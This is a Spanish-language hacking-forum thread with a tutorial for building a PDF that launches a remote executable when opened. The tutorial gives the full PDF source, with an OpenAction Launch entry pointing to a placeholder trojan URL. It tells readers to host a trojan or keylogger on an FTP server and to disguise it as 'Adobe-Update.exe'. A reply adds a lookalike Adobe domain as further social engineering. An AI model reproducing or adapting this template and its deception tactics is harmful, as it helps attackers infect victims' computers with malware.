Ejecutar *.exe al abrir un PDF

[kity54]

Necesitamos:

    Nuestro *.exe (troyano, keylogger, bot, joke, etc...)
    Un FTP.

Dos simples cosas... Bueno, una vez definido el *.exe que vamos a usar, lo vamos a subir a un FTP, puede ser cualquiera que te deje subir archivos y descargarlos directamente con el formato ftp.miftp/server_troyano.exe también sirve algún uploader que deje la url en el mismo formato y que sea directo (sin captcha y sin retraso), en este caso no sirve ni megaupload, ni rapidshare, etc...

Empecemos:

Código: You are not allowed to view links. Register or Login

Inicio --> ejecutar --> notepad.exe
Pegan este código:

Código: You are not allowed to view links. Register or Login

%PDF-1.1

1 0 obj
<<
 /Type /Catalog
 /Outlines 2 0 R
 /Pages 3 0 R
 /OpenAction 8 0 R
>>
endobj

2 0 obj
<<
 /Type /Outlines
 /Count 0
>>
endobj

3 0 obj
<<
 /Type /Pages
 /Kids [4 0 R]
 /Count 1
>>
endobj

4 0 obj
<<
 /Type /Page
 /Parent 3 0 R
 /MediaBox [0 0 612 792]
 /Contents 5 0 R
 /Resources
 << /ProcSet 6 0 R
    /Font << /F1 7 0 R >>
 >>
>>
endobj

5 0 obj
<< /Length 46 >>
stream
BT
/F1 24 Tf
100 700 Td
(Hacking[Blackploit]--> Blackploit.blogspot.com)Tj
ET
endstream
endobj

6 0 obj
[/PDF /Text]
endobj

7 0 obj
<<
 /Type /Font
 /Subtype /Type1
 /Name /F1
 /BaseFont /Helvetica
 /Encoding /MacRomanEncoding
>>
endobj

8 0 obj
<<
 /Type /Action
 /S /Launch
 /Win
 <<
  /F (http://www.FTP-gratuito.com/server_troyano.exe)
 >>
>>
endobj

xref
0 9
0000000000 65535 f
0000000012 00000 n
0000000109 00000 n
0000000165 00000 n
0000000234 00000 n
0000000401 00000 n
0000000505 00000 n
0000000662 00000 n
trailer
<<
 /Size 9
 /Root 1 0 R
>>
startxref
751
%%EOF
Aquí lo único que tiene que modificar es:

Código: You are not allowed to view links. Register or Login

  /F (http://www.FTP-gratuito.com/server_troyano.exe)
En You are not allowed to view links. Register or Login ponen el link de su *.exe previamente subido a un FTP.

Ya modificado todo, guardan el documento como exploit.pdf o como quieran, lo importante es que termine en *.pdf

Resultado:

Al abrir el pdf nos salta una ventana pidiendo que ejecutemos un *.exe.
Recomendanción: que su *.exe se llame Adobe-Update.exe.


Al poner abrir se ejecuta nuestro *.exe.

Para más detalles vean el video : You are not allowed to view links. Register or Login

Fuente: indetectables.net y blackploit

Saludos

[alexander1712]

me encantó, lo tendré en cuenta.

saludos!

[met0]

Yo esperaba algo mejor.
Ya que al "Abrir el PDF" no ejecuta exactamente un .exe, para llegar a eso Adobe Reader (Por seguridad) muestra un aviso de lo que podria ser un posible virus ó malware que puede dañar el equipo, lo más importante es que muestra la ruta completa del archivo (Troyano), esto hará que la victima tenga más sospechas.
Saludos

[baronpower]

genial, gracias, saludos

[alexander1712]

Yo esperaba algo mejor.
Ya que al "Abrir el PDF" no ejecuta exactamente un .exe, para llegar a eso Adobe Reader (Por seguridad) muestra un aviso de lo que podria ser un posible virus ó malware que puede dañar el equipo, lo más importante es que muestra la ruta completa del archivo (Troyano), esto hará que la victima tenga más sospechas.
Saludos

si saves ingeniería social no hay mensaje que valga, es cuestion de hacer

http//update.adode.com.ar/update_10.4.exe

saludos!